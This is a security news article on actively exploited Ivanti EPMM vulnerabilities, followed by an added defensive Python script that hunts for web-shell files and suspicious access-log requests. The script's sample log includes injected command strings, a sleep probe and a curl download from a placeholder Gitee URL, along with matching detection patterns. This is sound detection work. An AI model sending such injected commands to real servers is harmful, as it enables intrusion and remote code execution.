Two serious zero-day vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM), tracked as CVE-2026-1281 and CVE-2026-1340, have surfaced as a significant threat to enterprise networks, with active exploitation campaigns targeting corporate infrastructure across several nations. The vulnerabilities allow unauthenticated attackers to remotely execute arbitrary code on target servers; no user interaction or credentials are needed.
Organizations in the US, Germany, Australia, and Canada have already been affected, with a particularly heavy impact on high technology, manufacturing, healthcare, state and local government, and professional services. Because a successful attack grants total control over the mobile device management infrastructure, threat actors can install web shells, create reverse shells, perform reconnaissance, and download additional malicious software.
Since the vulnerabilities were made public in January 2026, Unit 42 has recorded numerous automated exploitation attempts. Because of its severity and active exploitation, CVE-2026-1281 was promptly added to the U.S. Cybersecurity and Infrastructure Security Agency's Known Exploited Vulnerabilities Catalog. Using Cortex Xpanse telemetry, researchers at Palo Alto Networks identified more than 4,400 EPMM instances exposed on the internet.
The analysts observed that threat actors are rapidly accelerating their operations, from initial reconnaissance to the deployment of dormant backdoors intended to sustain long-term access even after organizations apply security patches. This illustrates how attackers adapt their tactics to guarantee ongoing access to compromised networks. The root cause of both vulnerabilities is unsafe bash script usage in legacy components that manage URL rewriting within the Apache web server configuration.
CVE-2026-1281 affects scripts used for the In-House Application Distribution feature, while CVE-2026-1340 affects the Android File Transfer mechanism.

Methods of Attack and Malicious Behavior

During exploitation attempts, attackers have used a variety of malware and tools to compromise susceptible systems. According to security researchers, lightweight JSP web shells with names like 401.jsp, 403.jsp, and 1.jsp were installed in the server's web application directory.
Figure 1: Command format aimed at susceptible Ivanti EPMM servers (Source: Palo Alto Networks)

If the web server operates with elevated privileges, a successfully installed shell grants administrative control. Figure 1 displays command formats aimed at susceptible servers, while Figure 2 presents URL patterns from exploitation attempts.
Figure 2: URL and instructions from an attempt at exploitation (Source: Palo Alto Networks)

Threat actors also tried to download the Nezha monitoring agent, an open-source server utility, by retrieving it from Gitee repositories, with particular settings to target victims in China. In some campaigns, second-stage payloads that install persistent backdoors or cryptominers on compromised appliances were downloaded. Attackers also employed sleep commands as a reconnaissance technique to determine whether a server was vulnerable.
Reconnaissance attempts are depicted in Figure 5, and a decoded JSP web shell is shown in Figure 6. Ivanti released version-specific patches (RPM 12.x.0.x or RPM 12.x.1.x) that require no downtime and take only a few seconds to apply. Vulnerable systems should be patched immediately, and organizations should check appliances for indications of exploitation before patching.
To help customers spot signs of possible exploitation, the vendor also supplied an Exploitation Detection script created in collaboration with NCSC-NL. Unit 42 advises organizations to adopt an assumed-breach mindset and to treat any indicators found as possible compromises that warrant thorough investigation.
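The article names two kinds of post-exploitation evidence a defender can hunt for on an appliance: JSP files that do not belong in the web application directory (401.jsp, 403.jsp, 1.jsp) and web-server requests carrying the indicators described above (those file names, sleep-based reconnaissance, and downloads from Gitee). The script below is an added example of that hunt, not Ivanti's or Unit 42's detection tooling. The directory listing, the baseline of legitimate JSP files, the directory path and the access-log lines are all constructed for the example; on a real appliance the baseline would come from a known-good install or the vendor's package manifest, and the log would be the Apache access log.

```python
"""
Added example (not Ivanti's or Unit 42's tooling): an offline hunt over two
artefacts the article describes as post-exploitation indicators on an EPMM
appliance -- unexpected JSP files in the web application directory, and
access-log requests that reference the reported web-shell names, use
sleep-based reconnaissance, or fetch from Gitee.
All sample data below is constructed; the directory path is a placeholder.
"""
import re
from urllib.parse import unquote, urlsplit

# Web-shell file names reported in the article.
KNOWN_SHELL_NAMES = {"401.jsp", "403.jsp", "1.jsp"}

# Assumption: JSP files that legitimately ship in the directory. On a real
# system this baseline comes from a known-good install, not from this script.
BASELINE_JSP = {"index.jsp", "error.jsp"}

# Constructed directory listing; the path is a placeholder, not the EPMM path.
SAMPLE_LISTING = [
    "/opt/webapp-placeholder/index.jsp",
    "/opt/webapp-placeholder/error.jsp",
    "/opt/webapp-placeholder/403.jsp",
    "/opt/webapp-placeholder/tmp/x.jsp",
]

# Constructed access-log lines in Apache Combined Log Format.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Jan/2026:10:00:01 +0000] "GET /mifs/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.10 - - [12/Jan/2026:10:00:05 +0000] "GET /403.jsp HTTP/1.1" 200 88 "-" "curl/8.0"
198.51.100.7 - - [12/Jan/2026:10:01:12 +0000] "GET /index.jsp HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Jan/2026:10:01:30 +0000] "GET /mifs/?x=sleep%2010 HTTP/1.1" 500 0 "-" "python-requests/2.31"
192.0.2.5 - - [12/Jan/2026:10:02:00 +0000] "GET /mifs/?x=curl%20https://gitee.com/placeholder/agent.sh HTTP/1.1" 200 0 "-" "curl/8.0"
"""

# Client IP, timestamp, method, request target and status from a log line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# "sleep <seconds>" after URL decoding, the timing probe the article mentions.
SLEEP_RE = re.compile(r"\bsleep\s+\d+")


def find_unexpected_jsp(listing, baseline=BASELINE_JSP):
    """Return (path, reason) for every JSP file that is not in the baseline."""
    findings = []
    for path in listing:
        name = path.rsplit("/", 1)[-1]
        if not name.lower().endswith(".jsp") or name in baseline:
            continue
        reason = "known_shell_name" if name in KNOWN_SHELL_NAMES else "not_in_baseline"
        findings.append((path, reason))
    return findings


def classify_request(target):
    """Return the indicator tags that apply to one request target."""
    decoded = unquote(target)  # decode %20 etc. before matching
    basename = urlsplit(decoded).path.rsplit("/", 1)[-1]
    tags = []
    if basename in KNOWN_SHELL_NAMES:
        tags.append("web_shell_name")
    if SLEEP_RE.search(decoded):
        tags.append("sleep_recon")
    if "gitee.com" in decoded.lower():
        tags.append("gitee_download")
    return tags


def scan_access_log(text):
    """Return one finding per log line that carries at least one indicator."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, ts, method, target, status = m.groups()
        tags = classify_request(target)
        if tags:
            findings.append({"line": line_no, "ip": ip, "time": ts,
                             "status": int(status), "target": target, "tags": tags})
    return findings


if __name__ == "__main__":
    for path, reason in find_unexpected_jsp(SAMPLE_LISTING):
        print(f"JSP  {reason:17} {path}")
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"LOG  line {hit['line']} {hit['ip']} {','.join(hit['tags'])} {hit['target']}")
```

The two checks are deliberately independent: a file hit without a matching request can mean the access log has been rotated or cleared, and a request hit without a file can mean the shell was removed or never landed. Either one, per the assumed-breach guidance above, is reason to preserve the appliance for investigation rather than to patch over it.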